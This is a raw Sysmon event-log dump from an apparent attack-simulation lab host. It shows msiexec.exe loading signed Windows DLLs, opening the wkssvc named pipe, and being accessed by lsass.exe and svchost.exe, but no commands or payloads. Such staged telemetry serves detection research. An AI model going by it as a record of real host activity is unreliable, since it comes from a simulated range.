15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693444Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693443Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0C00-000000006202}708752C:\Windows\system32\svchost.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+40856|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+54f9b|C:\Windows\System32\RPCRT4.dll+5367a|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693442Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693441Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693440Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693439Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 18141800x80000000000000002693437Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-ConnectPipe2022-06-17 15:05:09.069{7CF983DC-9824-62AC-246B-000000006202}2292\wkssvcc:\windows\system32\msiexec.exeWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693436Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.069{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693435Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.069{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693434Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.069{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693433Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.069{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693432Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.069{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\msctf.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=CA0121D9089BBFE1CB95A04E09E04C90,SHA256=B264FBE125E02FFBCDBBFF811B75B3ECEF31FD7762BD67BEE41492ED33CC146FtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693431Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.069{7CF983DC-EE56-62A8-1500-000000006202}10483980C:\Windows\system32\svchost.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693430Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.069{7CF983DC-EE56-62A8-1500-000000006202}10481096C:\Windows\system32\svchost.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693429Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.069{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693428Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.053{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\coml2.dll10.0.14393.2608 (rs1_release.181024-1742)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOML2.DLLMD5=F51CCB7A95B83C1327390BF672AFD328,SHA256=850E50B525EF51374B880146E26464D10A8B1DAE1E0307F7B27DC7322824F2BFtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693427Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.037{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693426Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.037{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\SHCore.dll10.0.14393.5066 (rs1_release.220401-1841)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=FC58D75DDAF44088B9101BE2418B1967,SHA256=74A0CCA04F2405A329897A6A1A3E90A0CE48E5772F85E7188C75677CD9D78160trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693425Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.037{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693424Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.037{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693423Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.037{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\windows.storage.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=BB44598D2B17603D605EDE11A148A21B,SHA256=C45410A330C2EC62581E18FD91F8CDB9873B8F64E5C5ACC79DB4970238077177trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693422Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.037{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693421Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.037{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\shell32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=B47A76105A5F59EDA244105A6D5D51D1,SHA256=012675AF0811AA0787D3731FED4D186F6D1B6279F27B2BF360AB49CA457F4E25trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693420Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.037{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\msi.dll5.0.14393.5127Windows InstallerWindows Installer - UnicodeMicrosoft Corporationmsi.dllMD5=F8E11A5BD7A918A13BA3C7924B5AD360,SHA256=98B5EBA9E9A0DD04885D594851A6CACF79304F7524959F502F5DA034B2C6BE60trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693419Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.006{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693418Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.006{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\ole32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=EB53D1BF6E1667C8727EBBB5D5A862ED,SHA256=2B3D48DFA43A284B1C66A8A98B0A48104133D86EEEB2E8E060BE2281CF476348trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693417Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.006{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693416Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.006{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693415Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.006{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693414Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.006{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc_os.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc_os.dllMD5=B80907BCF327C925E7AC990D81A705E6,SHA256=58A71BD4A0DDA6EAE49A50ABF92F73FD1792B218B7F811E06431CEF8EFF77040trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693413Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.006{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693412Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.006{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\winspool.drv10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=592EDD495F3F412C7E917CABE9B2A15E,SHA256=FC5D6EA6C14E6AA94ADE04D6D0C3AAAB8942864B118DE8219A712133DEF50550trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693411Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.006{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc.dllMD5=22BEEEDFF247B8F90252646C91E775E5,SHA256=10F0FF6F6F21CCC3343BCBCC9B5158A95EC328C1C21F3B9482C688848B89E1DDtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693410Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.006{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FADtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693409Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.006{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=920CEBB474555470F1FFB129AD6E19D8,SHA256=DE1C8EA3EF80E7A0E42664559AF3B29FE89E29189382AFC0B438D9C21E2D909AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693408Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.006{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693407Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.006{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\combase.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=148F67CE7413EB2D4D777030DFCCD28B,SHA256=5CBD4E213A26B9D8BE56677946D294F65FC615D710F8E07909B643D437819161trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693406Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.006{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\shlwapi.dll10.0.14393.5125 (rs1_release.220429-1732)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=407E895A220DE1A60C5B555A113FE998,SHA256=FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693405Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.006{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32full.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F284A98093B423946252259D7D2857D3,SHA256=193F70529B68EF108EA17ABC069E6DACF4541A547DF1D2F249F7555A58BCFA07trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693404Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.006{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693403Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.006{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693402Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.006{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693401Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.006{7CF983DC-9824-62AC-246B-000000006202}2292C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft 